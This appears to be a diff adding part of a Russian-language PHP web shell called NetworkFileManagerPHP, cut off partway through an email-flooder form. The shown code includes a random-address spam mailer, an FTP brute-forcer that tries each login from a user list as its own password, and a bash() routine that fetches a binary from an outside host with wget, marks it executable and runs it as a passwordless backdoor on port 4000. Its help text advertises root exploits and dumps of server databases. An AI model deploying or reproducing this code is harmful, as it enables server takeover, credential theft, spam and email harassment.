+   $word=array('wo','so','do','qo','ro','to','po','fo','go','ho','jo','ko','lo','zo','xo','co','vo','bo','no','mo');
+   $ab2=count($word);
+   return $wq2=$word[mt_rand(0,$ab2-1)];
+}
+function e() {
+   $word=array('we','se','de','qe','re','te','pe','fe','ge','he','je','ke','le','ze','xe','ce','ve','be','ne','me');
+   $ab3=count($word);
+   return $wq3=$word[mt_rand(0,$ab3-1)];
+}
+
+function i() {
+   $word=array('wi','si','di','qi','ri','ti','pi','fi','gi','hi','ji','ki','li','zi','xi','ci','vi','bi','ni','mi');
+   $ab4=count($word);
+   return $wq4=$word[mt_rand(0,$ab4-1)];
+}
+function u() {
+   $word=array('wu','su','du','qu','ru','tu','pu','fu','gu','hu','ju','ku','lu','zu','xu','cu','vu','bu','nu','mu');
+   $ab5=count($word);
+   return $wq5=$word[mt_rand(0,$ab5-1)];
+}
+
+function name0() {   return c().c().c().c();                    }
+function name1() {   return a().s();        }
+function name2() {   return o().s();        }
+function name3() {   return e().s();        }
+function name4() {   return i().s();        }
+function name5() {   return u().s();        }
+function name6() {   return a().s().g();        }
+function name7() {   return o().s().g();        }
+function name8() {   return e().s().g();        }
+function name9() {   return i().s().g();        }
+function name10() {   return u().s().g();        }
+function name11() {   return a().s().g().s();        }
+function name12() {   return o().s().g().s();        }
+function name13() {   return e().s().g().s();        }
+function name14() {   return i().s().g().s();        }
+function name15() {   return u().s().g().s();        }
+
+
+$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
+$domain1=array('mail.ru','hotmail.com','aol.com','yandex.ru','rambler.ru','bk.ru','pochta.ru','mail333.com','yahoo.com','lycos.com','eartlink.com');
+$d1c=count($domain1);
+
+function randword() {
+   global $cool,$cool2;
+   $func="name".mt_rand(0,15);
+   $func2="name".mt_rand(0,15);
+   switch (mt_rand(0,2)) {
+      case 0: return $func().$func2();
+      case 1: return $func().$cool[mt_rand(0,count($cool)-9)];
+	  case 2: return $func();
+      default: return $func();
+   }
+ }
+
+if (@unlink("email.txt") < 0){
+echo "ïóñòî";
+exit;
+}
+$file="email.txt"; 
+
+
+if($chislo){
+
+
+ $cnt3=mt_rand($chislo,$chislo);
+   for ($i=0; $i<$cnt3; $i++) {
+   $u=randword();
+  if(!isset($check_box)){
+  
+  if ( IsSet($_POST["domen"]) && sizeof($_POST["domen"]) > 0 )
+{
+   $domen = $_POST["domen"];
+      foreach( $domen as $k=>$v )
+   {
+       $d=$domen[mt_rand(0,$v-1)];
+   
+   }
+}
+$f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }else{
+  
+   $d=$domain1[mt_rand(0,$d1c-1)];
+   $f=@fopen(email.".txt","a+");
+   fputs($f,"$u@$d\n");
+   }
+   
+  }
+   $address = $file;
+  if (@file_exists($address)) {
+    if($changefile = @fopen ($address, "r")) {
+      $success = 1;
+    } else  {
+    echo " Íå íàéäåí  ôàéë <b>\"".$address."\"</b> !<br>";
+  }
+  
+   if ($success == 1) {
+   echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+    echo "<tr><td align=center class=pagetitle width=500>  Ñãåíåðåííî âñåãî <b>$chislo</b> email.</td></tr>";
+	echo "<tr><td align=center> ";
+    echo "<textarea name=\"email\" rows=\"13\" cols=\"58\" class=inputbox>";
+    while($line = @fgets($changefile,1024)) {
+      echo @trim(stripslashes($line))."\n";
+    }
+    echo"</textarea></td></tr></table>";
+	}
+	}
+if (!isset($action)){ 
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=spam1&status=ok' method=post enctype='multipart/form-data'>
+ <tr><td align=center class=pagetitle colspan=2><b>Ãëàâíûå íàñòðîéêè ñïàìåðà</b></font></b></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Îò êîãî ïèñüìî:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='from' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Êóäà îòâåò:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='otvet' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Èíòåðâàë îòïðàâêè (ñåê):</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='wait' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Òåìà ñîîáùåíèÿ:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='text' name='subject' size=50></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Òåêñò ïèñüìà:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<textarea name='body' rows='13' cols='60' class=inputbox> </textarea></td></tr>
+<tr><td align=center class=pagetitle width=150>&nbsp;&nbsp;Ôàéë:</td>
+<td align=left width=350>&nbsp;&nbsp;&nbsp;
+<input class='inputbox' type='file' name='filess' size=30></td></tr>
+<tr><td width=500 align=center colspan=2>
+<input type='submit' value='Ãåíåðèòü' class=button1 $style_button >
+<INPUT TYPE='hidden' NAME='$chislo'>
+</td></tr>
+ </form></table>";
+}
+}
+}
+function del() {
+global $PHP_SELF;
+$file_to_delete = basename("$PHP_SELF"); 
+@chmod("$file_to_delete", 0777); 
+if (@unlink("$file_to_delete") < 0){
+echo "ïóñòî";
+exit;
+}
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Óäàëåíèå NFM</b></font></b></td></tr>
+</table>";
+}
+
+function spam1() {
+ global $status, $from, $otvet, $wait, $subject, $body, $filess, $chislo, $action;
+ set_time_limit(0);
+ignore_user_abort(1);
+
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Îòïðàâêà ïèñåì ñ çàäàíûìè îïöèÿìè</b></font></b></td></tr>
+</table>";
+
+	
+ error_reporting(63); if($from=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Îò êîãî ïèñüìî>')</script>";exit;}
+ error_reporting(63); if($otvet=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Êóäà îòâåò>')</script>";exit;}
+ error_reporting(63); if($wait=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Èíòåðâàë îòïðàâêè>')</script>";exit;}
+ error_reporting(63); if($subject=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Òåìà ñîîáùåíèÿ>')</script>";exit;}
+ error_reporting(63); if($body=="") { print
+"<script>history.back(-1);alert('Íå çàïîëíåíî ïîëå: <Òåëî ïèñüìà>')</script>";exit;}
+
+  $address = "email.txt";
+  $counter = 0;
+ if (!isset($status)) echo "÷òî-òî íå òàê";
+ else {
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center bgcolor=#FFFFCC>Îòêðûâàåì ôàéë <b>\"".$address."\"</b> ... <br></td></tr>
+";
+  if (@file_exists($address)) {
+ echo "
+  <tr><td align=center bgcolor=#FFFFCC>Ôàéë <b>\"".$address."\"</b> íàéäåí...<br></td></tr>
+";
+    if($afile = @fopen ($address, "r")) {
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>Ôàéë <b>\"".$address."\"</b> îòêðûò äëÿ ÷òåíèÿ...<br></td></tr>
+";
+    } else {
+ echo "
+ <tr><td align=center class=pagetitle>Ôàéë <b>\"".$address."\"</b> íå ìîãó îòêðûòü äëÿ ÷òåíèÿ...<br></td></tr>
+";
+    }
+  } else {
+    echo "There is no file <b>\"".$address."\"</b> !<br>";
+    $status = "íå ìîãó íàéòè ôàéëà \"".$address."\" ...";
+  }
+ echo "
+ <tr><td align=center bgcolor=#FFFFCC>Íà÷èíàåì ÷òåíèå èç ôàéëà <b>\"".$address."\"</b> ...<br></td></tr>
+ </table>";
+  if (@file_exists($address)) {
+
+    while (!feof($afile)) {
+
+      $line = fgets($afile, 1024);
+      $line = trim($line);
+      $recipient = "";
+      $recipient = $line;
+	  
+  if ($filess) {
+	$content = fread(fopen($filess,"r"),filesize($filess));
+		$content = chunk_split(base64_encode($content));
+		$name = basename($filess);
+   } else {
+   $content ='';
+   }
+      $boundary = uniqid("NextPart_");
+	    
+	  $header    = "From: ".$from."\r\n";
+	  $header   .= "Reply-To: ".$otvet."\r\n";
+	  $header   .= "Errors-To: ".$otvet."\r\n";
+      $header   .= "X-Mailer: MSOUTLOOK / ".phpversion()."\r\n";
+	  $header .= "Content-Transfer-Encoding: 8bits\n";
+      $header .= "Content-Type: text/html; charset=\"windows-1251\"\n\n";
+	  $header .= $body;
+	  $header   .="--$boundary\nContent-type: text/html; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$filess \nContent-disposition: inline; filename=$filess \nContent-transfer-encoding: base64\n\n$content\n\n--$boundary--";
+
+		
+	  $pattern="#^[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+";
+      $pattern.="@";
+      $pattern.="[-!\#$%&\"*+\\/\d=?A-Z^_|'a-z{|}~]+\.";
+      $pattern.="[-!\#$%&\"*+\\./\d=?A-Z^_|'a-z{|}~]+$#";
+	  
+      if($recipient != "")
+      {
+        if(preg_match($pattern,$recipient))
+        {
+          echo "
+		  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <tr><td align=center class=pagetitle>Îòïðàâëÿåì ïèñüìî íà <b>\"".$recipient."\"</b>...îòïðàâëåíî ";
+        
+
+            if(@mail($recipient, stripslashes($subject), stripslashes($header))) {
+              $counter = $counter + 1;
+              echo "<b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+            } else {
+              echo "<tr><td align=center class=pagetitle>Íå êîððåêòíûé email, ñîîáùåíèå íå îòïðàâëåíî !</td></tr> </table>";
+            }
+          } else {
+              $counter = $counter + 1;
+             
+          }
+        } else {
+           echo "<br>";
+        }
+      $sec = $wait * 1000000;
+      usleep($sec);
+
+    }
+
+    if($otvet != "")
+    {
+
+      if(preg_match($pattern,$otvet))
+      {
+		echo " <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+		  <tr><td align=center class=pagetitle>Îòïðàâëÿåì ïèñüìî íà <b>\"".$otvet."\"</b> äëÿ ïðîâåðêè";
+        $subject = "".$subject;
+
+        if(@mail($otvet, stripslashes($subject), stripslashes($message), stripslashes($header))) {
+          $counter = $counter + 1;
+          echo " îòïðàâëåíî... <b>[\"".$counter."\"]</b> ".date("H:i:s")."</td></tr> </table>";
+        } else {
+          echo "<tr><td align=center class=pagetitle>íå îòïðàâëåíî...</td></tr> </table>";
+        }
+      } else {
+          echo "<tr><td align=center class=pagetitle>óêàçàí íå ïðàâëüíûé email.</td></tr> </table>";
+      }
+    } else {
+    }
+
+    if(@fclose ($afile)) {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>Ôàéë <b>\"".$address."\"</b> óñïåøíî çàêðûò!<br></td></tr> </table>";
+    } else {
+      echo "
+	   <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>Ôàéë <b>\"".$address."\"</b> íå ìîãó çàêðûòü!<br></td></tr> </table>";    }
+  } else {
+    echo "íå ìîãó ïðî÷èòàòü ôàéë  <b>\"".$afile."\"</b> ...<br>";
+  }
+
+     $status2 ="Ñòàòóñ: ".$counter." emailîâ îòîñëàíî.";
+    echo "<br>";
+    echo "
+	  <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+  <tr><td align=center class=pagetitle>$status2</td></tr> </table>"; 
+   
+}       
+}
+
+# ïîìîùü
+function help() {
+ global $action,$REMOTE_ADDR,$HTTP_REFERER;
+ echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Îïèñàíèå ñêðèïòà NetworkFileManagerPHP</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC>
+
+<blockquote><br>
+Äàííûé ñêðèïò ïèñàëñÿ âíà÷àëå òîëüêî äëÿ àäìèíèñòðàòèðîâàíèÿ ñâîåãî õîñòèíãà, íî â ïðîöåññå íàïèñàíèÿ 
+îí ïîçâîëÿë ñâîáîäíî ïåðåìåùàòüñÿ ïî ïàïêàì õîñòèíãà è ïðîñìàòðèâàòü ðàçëè÷íóþ èíôîðìàöèþ, 
+êîòîðàÿ äîñòóïíà òîëüêî root, â ïðîöåññå ýâîëþöèè ñêðèïòà ÿ åãî äîïîëíèë óíèêàëüíûìè ñâîéñòâàìè, 
+êîòîðûå äîñòóïíû âñåãî â îäíîì ôàéëèêå, âñå îñòàëüíûå ôàéëû íåîáõîäèìûå äëÿ åãî ðàáîòû ñîçäàþòñÿ â ïàïêå,
+ãäå çàëèò NFM. Òî åñòü äàííûé ñêðèïò ïîëíîñòüþ àâòîíîìåí çà èñêëþ÷åíèåì ýêñïëîéòîâ, êîòîðûå õðàíÿòñÿ íà ìîåì 
+ñåðâåðå è äîñòóïíû äëÿ ñêà÷èâàíèÿ, ïîñðåäñòâîì PHP.<br><br>
+
+<b>NetworkFileManagerPHP</b> - ñêðèïò äëÿ ïîëíîãî àäìèíèñòðàòèðîâàíèÿ ñâîåãî ñàéòà, à òàêæå è õîñòèíãà, 
+ãäå ýòîò ñàéò õîñòèòñÿ.<br><br>
+Â íàïèñàíèè äàííîãî ñêðèïòà áûëè çàäåéñòâîâàíû íåêîòîðûå àâòîðñêèå ðàçðàáîòêè, óâàæàåìûõ ïðîãðàììèñòîâ:<br>
+- èäåÿ èñïîëüçîâàíèÿ àëèàñîâ â öåëÿõ îáëåã÷åíèÿ íàáîðà êîìàíä <b>(Rush)</b><br>
+- ïðîñòåíüêèé Áðóòôîðñåð, êîòîðûé ïðîâåðÿåò ïàðîëü ïî åãî ëîãèíó <b>(TerraByte)</b><br>
+- èäåÿ ñ Mysql, ñïàñèáî ïîëüñêèì ïðîãðàììèñòàì<br>
+- îñòàëüíûå èäåè ìîè <b>(xoce)</b><br>
+- Ñïàñèáî çà òåñòèðîâàíèå ñêðèïòà âñåìó êàíàëó #hack.ru<br><br>
+
+<b>Âîçìîæíîñòè NetworkFileManagerPHP</b><br>
+1. Âîçìîæíîñòü ïðîñìàòðèâàòü ôàéëû õîñòèíãà 2-ìÿ ñïîñîáàìè (àêòóàëüíî åñëè îäèí èç íèõ îòêëþ÷åí íà õîñòèíãå, ïðîñìîòð îñóùåñòâëÿåòñÿ ÷åðåç fopen è cmd)<br> 
+2. Èñïîëüçîâàíèå àëüÿñîâ, òî åñòü óæå ãîòîâûå êîìàíäû, êîòîðûå ïðîïèñàíû â ðàñêðûâàþùåì ñïèñêå (èíòåðåñíû íîâè÷êàì, êîòîðûå íå çíàþò ëèíóêñà) <br>
+3. Ñêàíèðîâàíèå ñåðâåðà íà îòêðûòûå ïîðòû, ïîêàçûâàåò âñå îòêðûòûå ïîðòû íà ñåðâåðå è èõ ïðåäíàçíà÷åíèå. <br>
+4. Áðóò ñåðâåðà. Âñêðèïò âêëþ÷åí ïðîñòåíüêèé áðóò ñåðâåðà, ïðîâåðêà ïàðîëÿ ïî åãî ëîãèíó.(äàííûå î ïîëüçîâàòåëÿõ áåðóòüñÿ èç ôàéëà /etc/passwd). Âñå ïîäîøåäøèå ïàðîëè çàïèñûâàþòñÿ â ôàéë ñ èìåíåì õîñòèíãà.<br> 
+5. Äàìï áàçû mysql. Âîçìîæíîñòü ñäàìïèòü ëþáóþ áàçó Mysql, íàõîäÿùóþñÿ íà ýòîì õîñòèíãå. <br>
+6. Óñòàíîâêà bash shella. Âû ÷åðåç ñêðèïò âû ìîæåòå ïîëó÷èòü ïîëíîöåííûé áàêäîð, êîòîðûé îòêðûâàåò íà 4000 ïîðòó òåëíåò ñîåäèíåíèå. (íåîáõîäèì äëÿ ðóòàíèÿ ñåðâåðà)<br> 
+7. Çàùèùåí çàêðèïòîâàííûì ïàðîëåì.<br> 
+8. Äîáàâëåíà âîçìîæíîñòü àðõèâàöèè ëþáîé ïàïêè íà õîñòèíãå ñ ïðèñâîåíèåì åé óíèêàëüíîãî èìåíè, êîòîðîå ãåíåðèòñÿ èç 6 ñèìâîëîâ.<br> 
+9. Âîçìîæíîñòü ïîñëàòü ñåáå íà ìûëî ëþáîé ôàéë íàõîäÿùèéñÿ íà ñåðâåðå (ìûëî ïðàâèòü â ñàìîì ñêðèïòå íà ñâîå) <br>
+10. Ïðîñìîòð ëîêàëüíî êàðòèíîê (jpg, jpeg,gif,png), âàì òåïåðü íå íóæíû ïàðîëè îò ïîðíî ðåñóðñîâ, âû ìîæåòå âñå ïðîñìîòðåòü ëîêàëüíî!!!<br> 
+11. Ïðîñìîòð ëîêàëüíî âèäåî (avi, mpg, mpeg), ÷òîáû íå êà÷àòü âñå ïîäðÿä ñ ïîðíî ðåñóðñîâ, âû ìîæåòå èõ ïðîñìîòðåòü ó ñåáÿ ÷åðåç Windows Media Player!!!<br> 
+12. Äîáàâëåíà áàçà ïóáëè÷íûõ ëîêàëüíûõ ýêñïëîéòîâ òàêèõ êàê ptrace, mremap, òàêæå â ñêðèïò âêëþ÷åíû íåêîòîðûå ïîëåçíûå ïðîãðàììêè BNC (ðàçäåë áóäåò ïîñòîÿííî ïîïîëíÿòüñÿ ñ íîâûìè âåðñèÿìè)<br> 
+Äîáàâëåíà áàçà ïðèâàòíûõ ýêñïëîéòîâ òîëüêî ëîêàëüíûé ðóò) <br>
+- brk <br>
+- sendmail 8.1.*<br> 
+- mremap_pte <br>
+- r00t <br>
+- ku3 <br>
+- ex_bru <br>
+- ptrace/kmod<br> 
+- mremap2 <br>
+13. Ïåðåáîð ïàðîëåé MD5 äî 32 ñèìâîëîâ(òåïåðü âàì íå íóæåí ïåðåáîðùèê John The Riper ëþáîé õîñòèíã, ó êîòîðîãî âêëþ÷åíî PHP ñäåëàåò ýòî çà âàñ, ïðè÷åì âñå àáñîëþòíî ëåãàëüíî, ðàáîòàåò äàæå ïðè îáðûâå ñâÿçè, òî åñòü îäèí ðàç çàïóñòèëè è óøëè ñïàòü, ïðîñíóëèñü à ôàéëèê ñ ðàñøèôðîâàííûì ïàðîëåì óæå â äåðèêòîðèè ãäå çàëèò NFM)<br>
+14. Ïîäáîð ïàðîëåé ê FTP ñ ñîçäàíèåì ëèñòà ñ ïàðîëÿìè íàëåòó ( â ëèñò ïàðîëåé âõîäèò:50 ñàìûõ ïîïóëÿðíûõ ïàðîëåé, îíè ïåðâûìè èäóò â ðàñøèôðîâêó, ïîòîì ïîäñòàíîâêà ê ëîãèíó ÷èñåë, íó à ïîòîì ðàíäîìíûå ïàðîëè êîòîðûå ñîçäàþòñÿ ñ èñïîëüçîâàíèåì ãëàñíûõ è ñîãëàñíûõ áóêâ, ïîëó÷àÿ ÷åëîâåêîïîäîáíûå âûðàæåíèÿ, êîòîðûå ìîãóò èñïîëüçîâàòüñÿ â ïàðîëÿõ)<br> 
+15. âêëþ÷åí óíèêàëüíûé ñïàìåð ìûë, ðàáîòàþùèé íà ëþáîì õîñòèíãå, âñå áàçû áóäåò ãåíåðèòü ðàíäîìíî, âàëèäíîñòü òàêèõ áàç áóäåò 40-45% ( èñïîëüçóåòñÿ óíèêàëüíûé àëãîðèòì ñîçäàíèÿ èìåí )<br>
+16. âîçìîæíîñòü çàãðóçèòü ëþáîé ôàéë ñ ëþáîãî õîñòèíãà íå ïðèáåãàÿ ê ôóíêöèè wget ( âñå ðåàëèçîâàíî ñðåäñòâàìè php, òåïåðü ìîæíî êà÷àòü ãèãàáàéòàìè.... ðàáîòàåò íå íà âñåõ õîñòèíãàõ )<br>
+17. Óäàëåíèå on-line
+18. Ñîôò íàêàçàíèÿ - ôëóä email, Easy Flood è Hard Flood.
+<b>Äàííûé ñêðèïò ïðåäóïðåæäàåò àäìèíèñòðàòîðîâ õîñòèíãà, ÷òî ïîðà ëàòàòü äûðû.
+Ýòèì ñêðèïòîì ìû ëèøü õîòåëè ïîêàçàòü, ÷òî ñ àïà÷åì øóòêè ïëîõè.</b><br><br>
+<b>Êàê íàñ íàéòè:</b><br>
+Irc server: irc.megik.net:6667 /join #hack.ru<br>
+Óâèäèìñÿ â ñåòè!!!<br></td></tr></table><br></blockquote>
+</td></tr>
+</table>";
+}
+
+function exploits($dir) {
+ global $action,$status, $file3,$file2,$tm,$PHP_SELF,$HTTP_HOST,$style_button, $public_site, $private_site, $private, $public, $title_ex, $title_exp;
+if (!isset($status)) upload_exploits(); 
+
+else 
+{
+
+$data = implode("", file($file3)); 
+$fp = @fopen($file2, "wb"); 
+fputs($fp, $data); 
+$ok = fclose($fp); 
+if($ok) 
+{ 
+$size = filesize($file2)/1024; 
+$sizef = sprintf("%.2f", $size);
+print "".exec("chmod 777 $public[1]")."";
+print "".exec("chmod 777 $public[2]")."";
+print "".exec("chmod 777 $public[3]")."";
+print "".exec("chmod 777 $private[1]")."";
+print "".exec("chmod 777 $private[2]")."";
+print "".exec("chmod 777 $private[3]")."";
+print "".exec("chmod 777 $private[4]")."";
+print "".exec("chmod 777 $private[5]")."";
+print "".exec("chmod 777 $private[6]")."";
+print "".exec("chmod 777 $private[7]")."";
+print "".exec("chmod 777 $private[8]")."";
+
+print "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Âû çàãðóçèëè: <b>ôàéë ðàçìåðîì</b> (".$sizef."êÁ) </font></center></td></tr></table>"; 
+} 
+else 
+{ 
+print "×òî-òî íå òàê."; 
+} 
+} 
+}
+
+
+# FTP-áðóò
+function ftp() {
+ global $action, $ftp_server, $filename, $HTTP_HOST;
+ ignore_user_abort(1);
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle>FTP-server: <b>$ftp_server</b></td></tr>";
+
+ $fpip = @fopen ($filename, "r");
+ if ($fpip) {
+  while (!feof ($fpip)) { 
+   $buf = fgets($fpip, 100);
+   ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+   $conn_id=ftp_connect($ftp_server);
+   if (($conn_id) && (@ftp_login($conn_id, $g[1], $g[1]))) {
+   
+   $f=@fopen($HTTP_HOST,"a+");
+   fputs($f,"$g[1]:$g[1]\n");
+     echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Connected with login:password - ".$g[1].":".$g[1]."</b></td></tr></table>";
+    
+   ftp_close($conn_id);
+   fclose($f);
+   } else {
+    echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center>".$g[1].":".$g[1]." - <b>failed</b></td></tr></table>";
+   }
+  }
+ }
+}
+
+function tar() {
+ global $action, $filename;
+ set_time_limit(0);
+ echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Àðõèâàöèÿ äàííûõ</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote> ñâÿçè ñ ðàçëè÷íûìè íàñòðîéêàìè ñåðâåðîâ, ÿ íå ñòàë ïîëíîñòüþ àâòîìàòèçèðîâàòü ñêðèïò ïîä êàæäûé ñåðâåð. Âàì òîëüêî îñòàíåòñÿ ïîäïðàâèòü òî÷íûå ïóòè ê ïàïêå äîìåíà è íàæàòü íà ââîä, âñå äàííûå ðàñïîëîæåííûå â âûáðàííîé ïàïêå çààðõèâèðóþòñÿ â àðõèâ tar.gz.<br><br>
+<b>Âíèìàíèå!!!</b><br>Òàê êàê ôàéë <b>passwd</b> ìîæåò áûòü áîëüøèì, òî îòêðûòèå âñåõ ïîëüçîâàòåëåé äàííîãî õîñòèíãà ïîòðåáóåò îïðåäåëåííîãî âðåìåíè.<br><br>
+<b>Ðåêîìåíäóåòñÿ!!!</b><br>Îòêðûòü äàííóþ îïöèþ â îòäåëüíîì îêíå, ÷òîáû ïðè ïðîñìîòðå õîñòèíãà îáðàùàòüñÿ ê íåé è àðõèâèðîâàòü èíôîðìàöèþ êîòîðàÿ âàñ çàèíòåðåñóåò.</blockquote></td></tr>
+</table><br>";
+
+$http_public="/public_html/";
+$fpip = @fopen ($filename, "r");
+if ($fpip) {
+ while (!feof ($fpip)) { 
+  $buf = fgets($fpip, 100);
+  ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g);
+  $name=$g[1];
+  echo "
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<form method='get' action='$PHP_SELF' >
+<tr><td align=center colspan=2 class=pagetitle><b>Àðõèâàöèÿ <u>$name.tar.gz</u>:</b></td></tr>
+<tr>
+<td valign=top><input type=text name=cm size=90 class='inputbox'value='tar -zc /home/$name$http_public -f $name.tar.gz' ></td>
+<td valign=top><input type=submit value='Äàâè' class=button1 $style_button></td>
+</tr></form></table>";
+  }
+ } 
+}
+
+
+
+# Óñòàíîâêà øåëà
+function bash() {
+ global $action, $port_bind, $pass_key;
+
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Óñòàíîâêà øåëà</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br>Äàííûé øåë óñòàíàâëèâàåòñÿ íà 4000 ïîðò, äîñòóï áåç ïàðîëÿ ïî òåëíåò ñîåäèíåíèþ</td></tr>
+</table><br>";
+
+echo "
+<TABLE CELLPADDING=0 CELLSPACING=0 width='500' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b> Äàííûå ïî øåëó çàïèñàíû â ôàéë <u><i>s</i></u></b></td></tr>";
+
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("wget http://vzlomanet.x25.net.ru/adm/exploits/bash/s")."</b> Cêà÷èâàåì...</td></tr>";
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("chmod 777 s")."</b> Óñòàíàâëèâàåì ïðàâà...</td></tr>";
+echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("./s")."</b> Çàïóñêàåì...íà 4000 ïîðò</td></tr>";
+# echo "<tr><td align=center bgcolor=#FFFFCC><b>&nbsp; ".exec("rm s")."</b> Óäàëÿåì <u>s</u>...</td></tr>";
+echo"</table>";
+
+ }
+ 
+ function flud() {
+ global $action, $check_box, $status, $emailflood, $kol, $wait, $sizeletter, $subject, $body;
+set_time_limit(0); 
+ignore_user_abort(1); 
+
+echo "<br>
+<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+<tr><td align=center class=pagetitle><b>Ôëóäåð Email</b></font></b></td></tr>
+<tr><td bgcolor=#FFFFCC><br><blockquote>Òàê óæ ïîëó÷èëîñü, ÷òî ðàáîòàÿ â èíòåðíåòå, ìû ÷àñòåíüêî íàðûâàåìñÿ íà ìîøåííèêîâ èëè íàñ ïîäñòàâëÿþò. 
+Íî åñëè ìû èìååì ìûëî îáèä÷èêà, òî ìû ìîæåì åìó ïîäãîâíèòü æèòèå. Äëÿ ýòèõ öåëåé è ïèñàëàñü äàííàÿ îïöèÿ. Ñ ïîìîùüþ ýòîé îïöèè âû ñìîæåòå çàôëóäèòü íåãîäÿÿ!!!</blockquote>
+</td></tr>
+</table><br>";
+echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form action='$PHP_SELF?action=flud' method=post>
+ <tr><td align=left valign=top colspan=4 class=pagetitle>
